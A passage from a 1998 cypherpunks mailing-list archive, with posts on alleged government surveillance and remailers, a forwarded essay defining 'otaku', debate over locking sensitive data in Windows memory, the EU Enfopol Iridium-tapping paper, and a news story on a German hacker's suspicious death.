fabrication of the facts, even if the underlying case was
real.

> just before the Berlin wall came down, the two Germanies 
> agreed to provide the FBI with direct access to the 
> backbone of the German telephone network

Except that telephone networks don't have "backbones."
More fantasy. And there was no single "German telephone
network," and probably still isn't.

> it is easier for the FBI to listen to German phonecalls 
> than it is for the German authorities themselves), which, 
> in addition to costing a horrendous amount of money,
> resulted in a bunch of data every day that took them two 
> days to process.

Highly doubtful. First, it's not in the FBI's brief to be
doing large-scale foreign-based surveillance of foreign
telephone systems. Second, there is no reason to believe
that the FBI would have a substantially easier time of 
processing large amounts of resulting data than would 
the Germans. The Germans know how to use computers, too,
and being congenitally statist, they no doubt have more
facilities in place closer to the sources of information
than do U.S. authorities at home or abroad.

This claim also ignores the fact that the FBI have their
hands full right at home and don't have the resources to
be conducting large-scale surveillance of the phone calls
of entire foreign nations. Oh, sure, we see increasing
extraterritorial operation by small numbers of FBI, but
that doesn't equate to monitoring the entire German phone
system(s) or a significant segment thereof and identifying 
some nitwit dialing in to AOL.

Is AOL even _in_ Germany? If so, what is it called, GOL?
Gassholes On Line?

The idea that a state security apparatus would find an AOL
account to be a significant obstacle is laughable.

> So, Fischer said, it would have been hopeless if the 
> fellow had not owed the German tax authority one and 
> a half million Marks - the tax authority busted him 
> (following the lines of their own, independent 
> investigation), took his computer, and he was busted.

So we are to believe that after monitoring the entire German
telephone system to identify who was calling in and using
a particular AOL account, and successfully pegging him,
the Germans were powerless to do anything, and had to 
call down their Tax Zombies to have an excuse to grab
the guy's computer, which presumably then provided them
with the "evidence" against him. Right.

If the German authorities overhear in a bar that you might 
have forbidden literature, they will be there the same night, 
ransacking your home. How is it that with evidence that a 
certain person was the user of an AOL account they had 
identified as the source of extortionary messages, they were 
powerless to break down his door? 

I could admire the FUD spreaders just a teensy bit if they
weren't so completely brain dead. They can't even invent a
plausible FUD scenario.

That the USG is operating one or more remailers is a 
no-brainer. That they are operating _all_ U.S. remailers
is beyond the realm of reality. That the FBI has more than
a casual hand in such things is not likely.

Running remailers would be right up the NSA's, uh, alley,
but maintaining a traffic watch on virtually _all_ 
remailers worldwide would be much more their style. Now 
_there's_ an opportunity for the spooks to have some real 
fun, though it's anything but certain they would be willing
to "share," for a variety of reasons. The capabilities they
have are protected as secrets even more than the information
they gather.

FUDBusterMonger

It Ain't FUD til I SAY it's FUD!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 28 Nov 1998 08:18:38 +0800
To: cypherpunks@cyberpass.net
Subject: Otaku Defined
Message-ID: <v04020a01b2844a696dce@[62.136.30.77]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Thu, 26 Nov 1998 05:31:08 -0500
X-Sender: dphelan@mailhost.pavilion.co.uk
Date: Thu, 26 Nov 1998 07:45:22 +0000
To: "Lord Myren" <lordmyren@hotmail.com>, wear-hard@haven.org
From: David Phelan <dphelan@pavilion.co.uk>
Subject: [WAY OFF TOPIC] Otaku Defined (was Re: Japanese Technomads )
Mime-Version: 1.0
Resent-From: wear-hard@haven.org
X-Mailing-List: <wear-hard@haven.org> archive/latest/5977
X-Loop: wear-hard@haven.org
Precedence: list
Resent-Sender: wear-hard-request@haven.org
Status: U

At 13:16 25/11/1998 PST, Lord Myren wrote:
<snip>
>Otaku is translated from japanese meaning "fan."  This is a somewhat
>flawed translation in that there is no way to transfer the powerful
>connotative meaning.
>
<snip>

>Unfortunately, I believe something was lost in the translation in the
>article.  Otaku is rarely used in refence to things other than anime.
>This article may have failed the translation or may just be a minor
>mislabeling.  Otaku can be used in reference to things other than anime,
>however it is rarely ever so.

>From a no-longer online magazine called JapanInterface (used to be at
http://www.php.co.jp/japaninface/):

Nerds of a Feather

Defining OTAKU
by Bill Marsh


IN TOKYO a recently arrived friend calls, wants to know daishikyu (ASAP,
yesterday) what otaku means. He's just been told by a mutual acquaintance
that no serious student of contemporary Japan could possibly not know this
word-yet his Japanese accuser, when
asked to define otaku, refuses even to try.

It isn't easy.

Once upon a time, this word-which taken alone translates as "[your]
honorable house"-was no more than an obsequious, laboriously indirect way
to say "you" or "you and yours." Snobs and bluestockings will use it, but
there's nothing inherently sinister about the
expression. The story doesn't end there.

Japan has long produced bumper crops of korekuta ("collectors" of rare
stamps, cars, etc) and mania (folks with a "mania" for Beatles bootlegs,
etc) who gather at conventions to compare notes and stockpiles. Haughty yet
insecure, many greet each other by asking, Otaku wa nani o nasatteru desu
ka? This fastidious formula for inquiring "What're you into?" or "What's
your thing?" became a trademark, prompting trend-watchers to smugly label
them otaku-zoku (nerd tribes).

Enter Tsutomu Miyazaki, arrested in 1989 and eventually charged with the
abduction and murder of four little girls. Here was a man capable of
videotaping himself cutting up a dead child and sending her bones, the
video, and photos of her sandals and clothes to the
victim's parents in a cardboard box. When a search of his premises
uncovered an eclectic collection of 5,000 videotapes, the image of otaku as
benign, shy dorks disintegrated.

Surprise! Japan's police and media, used to playing to the crowd and
blandly riding herd on the occasional misfit, discovered during the
affluent 1980s that their grip on a population easily tamed by fears of
what the neighbors might think was slipping. Popping up all over were
intense, asocial creatures on very private missions for very private gods.
Shunning contact with all but their brethren in obsession, they sent to
o-mawari-san (the neighborhood cops who in Japan regularly "check up" on
each household) a silent but clear message: Nothing personal, but what I'm
into is the kind of thing you and people like you would never understand.

Are otaku garden-variety nerds? Psychopaths? Undesirables? What otaku
connotes depends on who you ask. Example: A producer friend recently
berated his director on an NHK project for shooting from otaku camera
angles. The point? He wanted to make a TV program for general audiences,
not film-school coteries.

The foreword to the superb but dated (1989) Otaku no hon (The Otaku Book,
published by JICC) argues that otaku are strictly a post-1980 phenomenon,
not the latest gimmick in the ephemeral parade of zoku (tribes) that
postwar youth-culture reportage has
served up. Their break with the values of seken (the "real world," as the
editor parenthetically labels it in English) is not a byproduct of kodoku
(isolation) or seijuku (adolescence). Rather, otaku desire to dokuji no
sekai ni chujitsu ni ikiru (live faithfully in their own world) and find a
ba (place, outlet) to meet others who onaji genso o kyoyu suru (share the
same fantasy).

The editor offers the example of the rorikon (otaku with a "Lolita
complex"): deeply unwilling to become men (i.e., husbands and salarymen),
they partake instead of kyodo genso (communal fantasy) via comic books
about kaku no bi-shojo (imaginary beautiful
girlchildren). Their female equivalents in ambivalence are the yaoi-zoku,
girls hooked on perverted, plotless, sexually explicit parodies of
conventional comics about the friendship between cute boys. Obviously
neither homosexual nor homophobic, both groups
prefer the chaste option of onani (onanism) to the perceived compromises of
marital consummation.

Otaku no hon presents an amazing variety of strategies for sidestepping the
social compact. Even familiar types like hakka ("hackers"), gema ("gamers,"
computer game freaks), or aidorian ("idol-ians," who fixate on singing
idols) seem more over the top
than their American counterparts. Others, like kamera-kozo ("li'l camera
monks" who sneak crotch shots with concealed strobe cameras) and akushon
banda ("action banders" devoted to cracking officially "secure" radio and
computer systems), aggressively court risks to enact their pranks.

Whatever their stripe, the otaku are out there in droves, rifling through
the latest aniparoetchimangadojinshi
(animation-parody-pervert-comic-connoisseur-mag) at the corner bookstore,
terrified that any minute they'll be eaten alive by common
sense.

from Pop Japanese, Bill Marsh's ongoing column in MANGAJIN magazine


Hope that is useful
Dave Ph



--------------------------------------------------------------
 Dave Phelan                         dphelan@pavilion.co.uk
 CCIE# 3590     http://freepages.pavilion.net/users/dphelan

 "Anyone who isn't confused really doesn't understand the
 situation."                            -- Edward R. Murrow

--
Subcription/unsubscription/info requests: send e-mail with subject of
"subscribe", "unsubscribe", or "info" to wear-hard-request@haven.org
Wear-Hard Mailing List Archive (searchable): http://wearables.ml.org

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolfgang Scherer <Wolfgang.Scherer@gmx.de>
Date: Fri, 27 Nov 1998 14:55:49 +0800
To: cypherpunks@toad.com
Subject: Re: Old Hat
In-Reply-To: <199811270421.FAA13900@replay.com>
Message-ID: <13918.17985.297162.770002@farmer.simul.de>
MIME-Version: 1.0
Content-Type: text/plain




>>>>> "A" == Anonymous  <nobody@replay.com> writes:

A> Is AOL even _in_ Germany? If so, what is it called, GOL?
A> Gassholes On Line?

Yes it is. It's called AOL. "Alles On-Line" == "All [of it] On Line".
But it also translates well to "Arschlcher On-Line" == "Assholes On
Line".  :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sat, 28 Nov 1998 02:12:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: A tad more on Goldbach's...
In-Reply-To: <v03130310b27fc39f976f@[209.66.100.75]>
Message-ID: <199811271736.LAA15186@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim Writes to Jim Choate:

> Ditto for your bizarre theories about how electric fields work, about
> how charges inside conducting spheres don't follow Gauss's Law, and
> other crankish theories about electricity. 

Don't forget Mr. SQUID, which can read the registers on your
tamper-resistant smartcard from several miles away.  :)

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 28 Nov 1998 10:18:12 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Securing data in memory (was "Locking physical memory (RAM) under Windows") (fwd)
In-Reply-To: <199811232327.RAA23206@einstein.ssz.com>
Message-ID: <3.0.5.32.19981127120630.00902100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:27 PM 11/23/98 -0600, Jim Choate wrote:
>> From: "Jim Adler" <jadler@soundcode.com>
>> The SCNSM driver supports allocation of non-swappable memory on Windows
>> 3.x/95/98. The principal design goal of SCNSM is to provide memory that will
>> not be swapped to disk, under any circumstances. Typically, security
>> applications require such memory to store private keys, passwords, and
>> sensitive intermediate results of cryptographic calculations.

>1.  Is it OpenSource?
Is this a religious argument?  I think he said it was copyrighted freeware,
so use it and leave the copyright notices in and you're ok.

>2.  I assume since it never swaps to disk the memory requirements for the
>    computer are large. What is the minimum suggested if one runs say
>    5 apps that each require 16M each, 5*16M & OS overhead?

Bad Assumption.  The memory requirements are whatever you want;
if you're storing a few private keys, or intermediate calculation results,
the requirements are very small; if you're storing 16MB databases,
they're much larger.  For today, 16MB seems large enough that
I'd think you'd use a crypto-disk or instead of nailing it into RAM,
but the boundaries between huge, routine, and small keep moving
in this business, so maybe you do now, and you will soon enough.

Does anybody know if Win95/98 keeps RAMdisks in RAM, or swaps them
out to real disk along with other least-recently-used data?
Since I've got 48MB RAM on my laptop, I keep a 2MB RAMdisk around
for PGP decrypts, and for temporary storage of things like
emailed ZIP files.  

>    And what is the suggested OS overhead with no swap to disk?
>    (OK, that last one might be a 3rd question)

That's a good question.  My guess is that it's probably 0-2KB,
plus however big the drivers are, might be as big as 64KB,
but presumably isn't 1MB.  In other words, too small to worry about
on recent machines, where an extra 16MB RAM costs $10,
but if you're using that spare 4MB 386 as a remailer,
you've got to be more careful.

On the other hand, if the driver does anything for real-mode DOS processes
running on top of Windows, it wouldn't surprise me if you've
got to nail down 640KB while they're running?
But you knew that job was clunky when you took it.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 28 Nov 1998 10:27:21 +0800
To: "Bernardo B. Terrado" <metaphone@altavista.net
Subject: Re: manners....
In-Reply-To: <3653653A.1FD92C2B@students.wisc.edu>
Message-ID: <3.0.5.32.19981127122206.00902100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:54 AM 11/19/98 +0800, Bernardo B. Terrado wrote:
>Well I thought this list was a list of intellectuals, not only good in 
>hacks and coding and programming and the likes but also well "tailored"
>with their manners,  I have posted similar mails asking something but I
>have never received one like this. At least the less obvious thing to do
>is to ignore my message, simply delete it!, is that a hard thing to do?

Yo, Bernie - until you started asking for pirated commercial software,
I was wondering whether you were trolling by asking newbie questions
or just a real newbie who hadn't looked at any of the literature yet.  
Knapsacks are, after all, broken long ago, and anything written 
since about 1980 that talks about them will also say that.

I'd recommend getting Bruce Schneier's "Applied Cryptography"
and spending a while with it, then looking for academic stuff
beyond that if you want, and also reading the documentation for PGP
for practical stuff (in particular, Phil's comments on Snake Oil.)
There are also some FAQs out there, such as the sci.crypt FAQ.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 28 Nov 1998 03:55:42 +0800
To: users@EINSTEIN.ssz.com (SSZ User Mail List)
Subject: Scientific American: Science and the Citizen: BEATING THE TEMPEST: (fwd)
Message-ID: <199811271931.NAA02644@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From stugreen@realtime.net Fri Nov 27 00:31:17 1998
Sender: root@coney.lsd-labs.com
Message-ID: <365E45CB.549F4085@realtime.net>
Date: Fri, 27 Nov 1998 06:25:15 +0000
From: Stu Green <stugreen@realtime.net>
X-Mailer: Mozilla 4.5 [en] (X11; I; Linux 2.0.36 i586)
X-Accept-Language: en
MIME-Version: 1.0
To: ravage@einstein.ssz.com
Subject: Scientific American: Science and the Citizen: BEATING THE TEMPEST: 
 December 1998
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

http://www.sciam.com/1998/1298issue/1298techbus4.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 28 Nov 1998 12:09:53 +0800
To: cypherpunks@cyberpass.net
Subject: Fwd: FC: EU eavesdropping on Iridium satellite phone system
Message-ID: <199811280332.TAA02042@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



any reactions? some of my newspaper colleagues are thinking of writing
about this...


>Date: Sat, 21 Nov 1998 14:12:45 -0800 (PST)
>From: Declan McCullagh <declan@well.com>
>To: politech@vorlon.mit.edu
>Subject: FC: EU eavesdropping on Iridium satellite phone system
>X-No-Archive: Yes
>Sender: owner-politech@vorlon.mit.edu
>Reply-To: declan@well.com
>X-Loop: politech@vorlon.mit.edu
>X-URL: Politech is at http://www.well.com/~declan/politech/
>
>
>---------- Forwarded message ----------
>Date: Sat, 21 Nov 1998 22:08:00 +0100
>From: Erich Moechel <erich-moechel@quintessenz.at>
>To: Declan McCullagh <declan@well.com>, declan@well.com
>Subject: EU eavesdropping on Iridium System
>
>
>It is really a ghastly paper, we obtained. It is the first ever "Enfopol" 
>paper that leaked out from United European Police Working Group. 
>Not even the EU's STOA-commission that brought Echelon in2 EU-
>Parliament this spring was given the predecessor 2 "Enfopol 98"
>cu
>me 
>
>The European Surveillance Union
>
>Erich Moechel 20.11.98 
>
>Europol Seeks a Broad Structure for Tapping Mobile 
>Communications 
>
>Austrian officials' appetite for coldly broadening their authority to 
>monitor private citizens is in no way a unique case in Europe. 
>
>As a Europol internal document obtained by Telepolis shows, 
>massive attempts on the part of European police forces are 
>underway to acquire the ability to eavesdrop on the Iridium system, 
>currently in a sensitive stage of expansion. 
>
>The document entitled "Enfopol 98" from the group "Police 
>Cooperation" dated September 3, 1998, deals with the "observation 
>of telecommunications" and primarily addresses the so-called 
>satellite-supported personal communication systems (S-PCS), but 
>also the Internet. On the recommendation of the European Union, a 
>list of points desired by the European police was drawn up as a 
>"Draft for a Recommended Resolution" in order to simplify the 
>passage of the resolution. The terrestrial gateway stations are to 
>provide comprehensive access via Iridium and other Mobile Satellite 
>Services (MSS) since they are "collective and simple locations for 
>monitoring solutions." 
>
>http://www.telepolis.de/tp/english/inhalt/te/1667/1.html
>-.-.- --.-  -.-.- --.-  -.-.- --.-
>     q/depesche taeglich ueber
>internationale hacks--.-zensur im netz
>crypto--.-IT mergers--.-monopole
>& die universalitaet digitaler dummheit
>subscribe http://www.quintessenz.at
>-.-.- --.-  -.-.- --.-  -.-.- --.-
>Certified PGP key http://keyserver.ad.or.at 
>-.-.- --.-  -.-.- --.-  -.-.- --.-
>erich-moechel.com/munications
>++43 2266 687201 fon  ++43 2266 687204 fax
>-.-.- --.-  -.-.- --.-  -.-.- --.-
>
>
>
>--------------------------------------------------------------------------
>POLITECH -- the moderated mailing list of politics and technology
>To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
>subscribe politech
>More information is at http://www.well.com/~declan/politech/
>--------------------------------------------------------------------------
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 29 Nov 1998 00:25:04 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
Message-ID: <199811281551.JAA04132@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 27 Nov 1998 12:06:30 -0500
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: Securing data in memory (was "Locking physical memory
>   (RAM) under Windows") (fwd)

> >1.  Is it OpenSource?
> Is this a religious argument?  I think he said it was copyrighted freeware,
> so use it and leave the copyright notices in and you're ok.

Where does he say that Bill? And while it ain't religious, there are some
perferences to having it open source versus controlled source.

> >2.  I assume since it never swaps to disk the memory requirements for the
> >    computer are large. What is the minimum suggested if one runs say
> >    5 apps that each require 16M each, 5*16M & OS overhead?
> 
> Bad Assumption.  The memory requirements are whatever you want;

Wrong, since the ENTIRE OS is run under this it's not nearly that simple.
The OS's internal swap page as well as by extension the contexts they point
to are going to be sitting in there. The app should also encrypt the address
spaces of the system structures.

> if you're storing a few private keys, or intermediate calculation results,
> the requirements are very small; if you're storing 16MB databases,
> they're much larger.  For today, 16MB seems large enough that
> I'd think you'd use a crypto-disk or instead of nailing it into RAM,
> but the boundaries between huge, routine, and small keep moving
> in this business, so maybe you do now, and you will soon enough.

Where in that description does it say it allows particular apps to use this
product?

> Does anybody know if Win95/98 keeps RAMdisks in RAM, or swaps them
> out to real disk along with other least-recently-used data?

You don't know this but you're willing to try to rake me....

Talk about unprepared.

> >    And what is the suggested OS overhead with no swap to disk?
> >    (OK, that last one might be a 3rd question)
> 
> That's a good question.  My guess is that it's probably 0-2KB,
> plus however big the drivers are, might be as big as 64KB,
> but presumably isn't 1MB.  In other words, too small to worry about
> on recent machines, where an extra 16MB RAM costs $10,
> but if you're using that spare 4MB 386 as a remailer,
> you've got to be more careful.

Your guess is pretty much worthless. What we'd like is an aswer from the
person who wrote it.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 29 Nov 1998 00:26:41 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Article V - an analysis (fwd)
Message-ID: <199811281557.JAA04199@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 27 Nov 1998 00:00:07 -0500
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: Article V - an analysis (fwd)

> The most recent amendment (27th?) sat around for nearly 200 years
> before 3/4 of the states ratified it,  (preventing Congress from 
> raising their salaries during their current term.)  
> The power to specify a time limit doesn't need separate mention; 
> the time limit is either part of the proposed amendment, or it isn't, 
> and it's part of the negotiations for getting Congress to pass it.

Really? Where do you see that in the Constitution?

> The more dangerous problem is that people keep suggesting a 
> Constitutional Convention, which has basically no limits on its scope

And where do you see unlimited power assigned at under Article V?

> (especially given the one previous precedent, which substantially
> increased Federal power beyond the limits of the Articles,
> and didn't require unanimous consent to adopt its product,
> though the Articles required it for changing them.)

That isn't a precedence.

> Even if the states _say_ they're limiting their delegation to
> specific tasks, that doesn't mean the ConCon won't exceed them,
> and if it gets sufficient media/public support, it can get away with it.

Sure it does, then the states remove their support and it isn't a convention
anymore.


				ARTICLE V. 
 
	[Constitution: how amended; proviso.] 
 
	The Congress, whenever two thirds of both Houses shall deem it 
necessary, shall propose Amendments to this Constitution, or, on the 
Application of the Legislatures of two thirds of the several States, shall 
call a Convention for proposing Amendments, which, in either Case, shall be 
valid to all Intents and Purposes, as Part of this Constitution, when ratified 
by the Legislatures of three fourths of the several States, or by Conventions 
of the three fourths thereof, as the one or the other Mode of Ratification 
may be proposed by the Congress; Provided that no Amendment which shall be 
made prior to the Year One thousand eight hundred and eight shall in any 
Manner affect the first and fourth Clauses in the Ninth Section of the first 
Article; and that no State, without its Consent, shall be deprived of it's 
equal Suffrage in the Senate. 
 
 

    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 29 Nov 1998 00:24:27 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: European Commission proposal on legal framework for e-commerce (fwd)
Message-ID: <199811281558.JAA04252@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 26 Nov 1998 23:45:00 -0500
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: European Commission proposal on legal framework for e-commerce

> A proposal for a Directive to establish a coherent legal framework for the
> development of electronic commerce within the Single Market has been put
> forward by the European Commission.

That's pretty gutsy, put your goal in plain english in the first sentence.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>x@z.wyx
Date: Sat, 28 Nov 1998 18:14:56 +0800
To: cypherpunks@Algebra.COM
Subject: Remailer test, ignore
Message-ID: <199811280951.KAA20086@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



This string is to be used for tracing this message.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 29 Nov 1998 02:07:18 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
Message-ID: <199811281744.LAA04641@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 28 Nov 1998 17:41:53 +0100
> From: Anonymous <nobody@replay.com>
> Subject: Re: Securing data in memory (was "Locking physical memory (fwd)

> What is Choate thinking when he says the ENTIRE OS is run under this?

My mistake. Since it really does only handle individual apps it's of limited
utility in the Windows world because of the numerous ways to get system
level access.

> This is a driver which is used by the application to allocate specific
> memory buffers in non-swappable memory.  It allows the app to lock down
> those buffers so that they won't swap to disk.  These buffers can then
> be used to hold sensitive data.

Considering that this doesn't prohibit apps from getting access to that
memory, it only prohibits that memory page from being written to disk, it
has limited utility. It's only real protection is against disk scans.

For example a bogus service could gain system level and initiate a DMA
transfer of that non-swappable ram into their own address space.

> It is neither possible nor desirable to run the ENTIRE OS out of
> such buffers.

Sure it is. It's the entire reason to have big online memory pools. Idealy
you'd have a computer with nothing but gig's and gig's of ram and no hard
drive at all.

> It is not possible because the OS is already written.
> It is Windows 3.x/95/98 (see above).  That OS does not make the special
> driver calls which would be necessary to allocate non-swappable memory.
> You would have to rewrite Windows to use the special calls, which isn't
> possible for a luser like Choate.

No, simply provide it enough ram it never has to swap out to disk except in
the case of updates to files. If ram's that cheap we could do away with the
drive completely.

> And it's not even desirable.  There is no reason to make the ENTIRE OS
> use non-swappable memory.

They why do I (and you unless youre using a tty) keep adding ram to my
Win/Linux/Solaris/AIX/HP/etc. boxes to reduce the swapping that is taking
place? It's slow, we put up with it because we can't afford those hundreds
of meg's of ram to hold our app and the entire database file (for example).

>  Most memory is simply not that sensitive.
> It holds public data, or data which is already on the disk in some form.
> Putting the ENTIRE OS into non-swappable memory gives up much of the
> advantage of having virtual memory in the first place.  It would be a
> giant step backwards in OS architecture.

No, it wouldn't. The question of swap or virtual space is one of economics
and not computer architecture. If it were economicaly feasible there would
be no drives just fast main ram.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 29 Nov 1998 02:50:43 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
Message-ID: <199811281827.MAA04760@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Jim Choate <ravage@einstein.ssz.com>
> Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
> Date: Sat, 28 Nov 1998 11:44:04 -0600 (CST)

> > Date: Sat, 28 Nov 1998 17:41:53 +0100
> > From: Anonymous <nobody@replay.com>
> > Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
> 
> > What is Choate thinking when he says the ENTIRE OS is run under this?
> 
> My mistake. Since it really does only handle individual apps it's of limited
> utility in the Windows world because of the numerous ways to get system
> level access.

I forgot to add that I'd still be interested in knowing if the utility would
support the entire OS being run under this and what the memory constraints
would be.

If I had 2 of the Samsung 4G memory modules w/ battery back-up I could run
an entire machine without a hard-drive.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 29 Nov 1998 08:35:54 +0800
To: cypherpunks@cyberpass.net
Subject: german hacker death suspicious
Message-ID: <199811282258.OAA19939@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



there used to be a lot of conspiracy literature circulating on
the itnernet
on the huge industry/black market of satellite decoding software, TV
decoding software, and encryption systems.. I personally never figured
this out but if someone could point out that material, I'd love to
go back and look at it
here's a pretty heavy article TCM will love<g>

------- Forwarded Message

Date: Fri, 27 Nov 1998 22:12:03 -0700
Subject: Murder or suicide? Hacker's death in October still a mystery

Murder or suicide? Hacker's death in October still a mystery

Copyright (c) 1998 Nando Media
Copyright (c) 1998 The Associated Press 

http://www.nando.net/newsroom/ntn/world/112798/world37_28777_noframes.html

BERLIN (November 27, 1998 3:15 p.m. EST http://www.nandotimes.com) -- He was a
gifted computer whiz -- one of the best, one who'd made the jump from illegal
tinkering to the legitimate, potentially lucrative business of making codes
crack-proof from hackers like himself.

But when Boris Floriciz was found hanging from a tree in a Berlin park on Oct.
22, his belt around his neck and his feet dragging the ground, it drew attention
even
outside the tight-knit world of hackers.

His friends wonder whether he was caught up in the murkier side of the trade --
one of spies, espionage and black-market criminals. Was it suicide, as police
suspect? Or homicide?

At 26, Floriciz seemed headed for a great future. He'd just finished his
computer science degree. International firms sought him as a consultant. He was
happy, say
his friends, who cannot believe he would take his own life.

Floriciz's friends wonder if he had become a threat to someone on the wrong side
of the business, leading to his death.

"That was not a personal decision," Andy Mueller-Maguhn, a friend and fellow
member of the Chaos Computer Club said. "For sure not. That was murder."

>From childhood, Floriciz looked destined to be an engineer. He was always taking
things apart to see how they worked. "Radios, television, clocks, the lawnmower
- - -- nothing was safe from him," his father told Stern magazine.

He dissembled a telephone booth to get at computer data inside. He was the first
hacker to crack the microchips on Deutsche Telekom telephone cards, used at
pay phones in Germany. His homemade card reloaded as the credit ran out.

After getting caught in 1995 and sentenced to probation, Floriciz "felt the need
to draw the line," said Mueller-Maguhn.

He joined Chaos, a 10-year-old group of computer devotees, and he went back to
college, earning his diploma in September by developing a scrambler to encode
telephone calls on high-speed, digital lines.

German media reports say Floriciz also was working on cracking decoders for pay
television -- a booming business spreading across Europe. One of the key
players is Robert Murdoch, whose digital broadcasting research firm NDS Ltd.
contacted Floriciz two years ago about being a code-design consultant.

"He was an exceptionally talented engineer," said Margot Field, spokeswoman at
the firm's London headquarters. NDS wanted to hire him, but couldn't move
forward because Floriciz hadn't yet graduated or completed his compulsory
military service. The firm's last contact with him was in June.

